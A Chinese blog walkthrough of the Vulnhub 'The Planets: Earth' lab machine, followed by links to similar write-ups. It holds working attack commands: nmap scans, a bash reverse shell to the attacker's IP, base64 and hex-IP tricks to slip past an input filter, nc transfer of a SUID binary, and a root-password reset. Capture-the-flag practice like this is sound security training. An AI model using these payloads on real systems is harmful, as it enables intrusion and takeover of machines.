The Planets: Earth靶场攻破

已于 2024-11-27 13:38:32 修改
阅读量1k 收藏 16
点赞数 15
分类专栏: 打遍vulnhub靶场 文章标签: 网络安全 web安全
于 2024-11-27 13:35:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_83946446/article/details/144077240
版权

前言

信息搜集的魅力在于未知你不知道你能获取什么信息

准备

导入虚拟机靶场使用net模式,开启kali,我的ip为192.168.204.131

靶机信息搜集

ip探测

nmap 192.168.204.0/24 

发现目标靶机192.168.204.138

nmap -sV -p- -A -T4 192.168.130 对目标端口信息

8947d96bbac74e6ca38d3906af5c53de.png

发现开放了22,80,443端口,和两个域名配置/etc/hosts

de189b73cda441aa89fa14392005b7dc.png

目录扫描

0f394a4a1bb3400c8df9bc933f9a41df.png

访问目录发现有用信息

https://earth.local//admin/login         https://terratest.earth.local/robots.txt    https://earth.local/

  逐一访问后发现可疑文件

b3e940e73ff742de8b2614856432b8eb.png

发现https://terratest.earth.local/robots.txt下的/testingnotes.*缺少后缀,常见后缀php,html,txt,png,jpg,jpeg,asp,js经尝试后发现https://terratest.earth.local/testingnotes.txt

2bb6e0cb3dfe4345bb4148253a626724.png

 翻译

测试安全消息系统注意事项:
*使用XOR加密作为算法,应该像RSA中使用的那样安全。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
待办事项:
*我们如何安全地将每月的密钥发送到地球?或者我们应该每周更换钥匙?
*需要测试不同的密钥长度以防止暴力破解。钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前还很基础。

 从这些话中看出有一个测试用户terra,他的密码和testdata.txt进行了异或加密,联想到首页的数值,应该需hex转字符,再异或解密。

81f934c7bc42417ba0cdcdae6256de45.png


 

导入key发现最后一个十六进制数解密出earthclimatechangebad4humans,应该是密码

账号terra密码earthclimatechangebad4humans登录成功

漏洞利用(命令执行)

411c776c528349f485cdb7dadc1ee550.png

翻译:欢迎 terra,在 Earth Messaging Machine 上运行 CLI 命令(小心使用)

可以命令执行,尝试反弹shell

攻击机: nc -lvnp 4444

bash -i  >& /dev/tcp/192.168.204.131/4444 0>$1

5c884f3d5b134174aeb02a7a4d7b0f84.png

回显不可远程登录,反弹绕过

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'
我把bash -i  >& /dev/tcp/192.168.204.131/4444 0>$1
进行base64加密


网上传播的绕过方法是把ip地址十进制转十六进制

bash -i  >& /dev/tcp/0xc0.0xa8.0xcc.0x8a/4444 0>$1

反弹成功 

37a4728fbccd46c987a7e5ea45458bc1.png

下一步提权

提权

后信息收集(suid提权)

find / -user root -perm -4000 -print 2>/dev/null 

9629d8bf19464914970258b665fd35f7.png

发现/usr/bin/reset_root可疑,(可理解为重新设值root)靶机有nc

运行发现可以重置root密码为Earth

靶机:nc 192.168.204.131 3333   <   /usr/bin/reset_root 

攻击机:nc -q 5  -lvnp 3333   >   eset_root

调试reset_root

 

chmod +x  ./reset_root

strace  ./reset_root

be900c3e6aab465fa108f575dcf6d312.png

发现缺少条件,在靶机创建以下文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch  /tmp/kcM0Wewe

重置密码为Earth

819ef2f660ae4f5585ba0f320d19492d.png

美丽的地球

4425d16c300e4c5bbff4ccb5a7f77da1.png

看到这里了,得博主点点赞,感谢大家的支持

 

 

 

 

 

Vulnhub靶场案例渗透[1]-The Planets Earth
qq_45776114的博客
09-25 1254
对应python文件内容,验证逻辑大概就是内容中不能包含标准的ipv4格式,这时候可以搜索shell 反弹中命令支持格式,将ip转换为。,推测是python代码中添加限制,通过apache httpd的配置文件可以找到python代码的位置为。下载之后检查下载ova文件的md5的值是否和页面描述一致,防止下载到被篡改的文件。发现执行失败,尝试通过nc方式将这个文件传输到本地进行排查为什么执行失败。发现是缺少三个文件导致执行失败,在靶机上创建这个三个文件。获取到test.txt文件内容,进行计算获取密钥。
vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 256
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
Vulnhub 靶场 Earth
The code way of kinnisoy
01-02 539
通关方案:https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html。
2-vulnhub靶场Earth
qq_49078152的博客
08-14 1752
vulnhub,earth靶机练习
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 1139
靶机渗透练习-The PlanetsEarth
vulnhub靶场合集之earth靶场渗透
weixin_62297109的博客
06-03 792
最近闲来无事,搞搞vulnbub靶场玩一玩,选个简单的直接点击跳转下载就好了。
earth靶机详解
weixin_44681307的博客
07-31 342
在cyberchef把密文先用一个hex解密16进制的解密,然后XOR时候放上我们的密钥,这样就能解密出来了,我们发现解密出来的东西很有规律,复制我们最前面的这一串。当我们远程时候发现不让我们远程,这里其实是给我们的ip地址做了一个过滤,就是不让我们输入ip地址,只要有ip地址就不行,但是我们可以用别的方法来绕过。而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字。因为我们得到一个用户名,一个密钥,其实就是我们的密码,肯定还有一个登陆网站。
The Planets: Earth(行星-地球)安装和打靶场
人们并不感谢罗辑
10-11 1261
根据放射性测年估计和其他证据,地球形成于45亿年前。在地球历史的最初十亿年里,海洋中出现了生命,并开始影响地球的大气层和表面,导致厌氧生物和后来的需气生物的繁殖。一些地质证据表明,生命可能早在41亿年前就出现了。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
United Planets: The Last Crusade:二维多方向射击游戏-开源
04-29
“联合星球:最后的十字军东征”是由意大利团队Unreal Project开发的第一款免费开源视频游戏。 《最后的十字军东征》是一款2D多向射击游戏,为这些旧式视频游戏的玩家带来了新的体验。 该团队现在发布游戏的首批版本...
Earth靶场练习
weixin_69602647的博客
08-02 269
earth靶场练习
vulnhub靶场The Planets Earth教程
m0_73248913的博客
01-20 529
可以发现触发条件是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe存在(后来尝试发现是需要三个文件都存在)在靶机上用touch命令创建这三个文件,创建完成后再执行/usr/bin/reset_root,执行成功,显示root的密码被修改成了Earth。从/usr/bin/reset_root执行失败的返回信息来看,是需要触发条件的,直接执行的话,触发条件都不满足。靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口。
vulnhub-Earth靶场练习
ljlrookiebird的博客
09-26 179
vulhub-earth靶场练习
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3240
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
Earth靶场
最新发布
g1uuyu的博客
01-05 197
而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字。扫描ip时候我们发现443是打开的,扫描第二个dns解析的443端口能扫描出来一个 txt 文件。打开后我们拿到了一个用户名 terra,并且这里告诉了我们一个加密方式是利用XOR异或方式加密的。打开后我们发现一个notes.*,就是什么后缀名都可以,但是notes明显应该是txt后缀。把这两条解析添加到hosts文件中去,这样我们才可以访问页面。testdata.txt其实就是我们的密钥。
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1805
靶机名称Earth
planet_Earth靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-01 1051
planet_Earth 靶场渗透记录
VulnHub靶场----Earth
qq_61670993的博客
10-18 566
Vulnhub靶场初体验
【靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2420
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值